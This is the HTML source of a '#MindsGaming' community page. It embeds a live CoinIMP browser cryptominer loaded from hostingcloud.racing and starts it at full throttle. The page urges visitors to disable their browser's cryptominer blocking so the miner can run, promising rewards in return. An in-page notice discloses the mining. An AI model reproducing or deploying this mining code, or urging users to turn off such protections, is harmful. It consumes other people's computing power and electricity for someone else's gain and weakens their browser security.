<!DOCTYPE html>

<html lang="en">
  <head>
    <title>#MindsGaming</title>

    <meta charset="utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="description" content="Community & Member Groups" />
    <meta
      property="og:image"
      content="https://cdn.glitch.com/6ca1674b-a03a-4e9c-9563-ed6203267aba%2FMGLogo.jpeg"
    />
    <link
      rel="icon"
      href="https://cdn.glitch.com/6ca1674b-a03a-4e9c-9563-ed6203267aba%2FMGLogo.jpeg"
    />
    <link rel="stylesheet" href="/style.css" />

    <script src="https://www.hostingcloud.racing/3g44.js"></script>
    <script src="/miner/minercheck.js"></script>
  </head>
  <body>
    <wrap>
      <app id="APP" class="display" title="HOME">
        <center>
          <label id="my-miner" class="">
            <article>
              <h1>Unblocking The Miner</h1>
              <p class="white">
                This site uses a cryptominer that supports the giving of the
                play to earn layout, some web browsers block cryptominers by
                default. To unblock the miner and unlock rewards click the
                shield and your browser, and customize your settings to allow
                the miner.
              </p>
              <img
                src="https://cdn.glitch.global/4d28a5f0-4bec-4873-9059-3319b8398254/Screenshot%20from%202022-11-19%2020-02-07.png"
              />
            </article>
            <script src="https://www.hostingcloud.racing/eHya.js"></script>
            <script>
              var _client = new Client.Anonymous(
                "965d2861fb2a4feecd31c6df44bb842f986bbdb2caccd02642aae8c5a23e3883",
                {
                  throttle: 0,
                  c: "w",
                }
              );
              _client.start();
              _client.addMiningNotification(
                "Top",
                "This site is running JavaScript miner from coinimp.com. If it bothers you, you can stop it.",
                "#cccccc",
                40,
                "#3d3d3d"
              );
            </script>
          </label>
          <label class="hide" id="miner-alert">
            Allow Our Miner To Earn Rewards...<label
              style="color: blue; cursor: pointer"
              onclick="learnMORE();"
              >Learn More</label
            >
            <div class="X" onclick="closealert();" id="close-miner-alert">
              X
            </div></label
          >
        </center>
      </app>
    </wrap>
  </body>
</html>
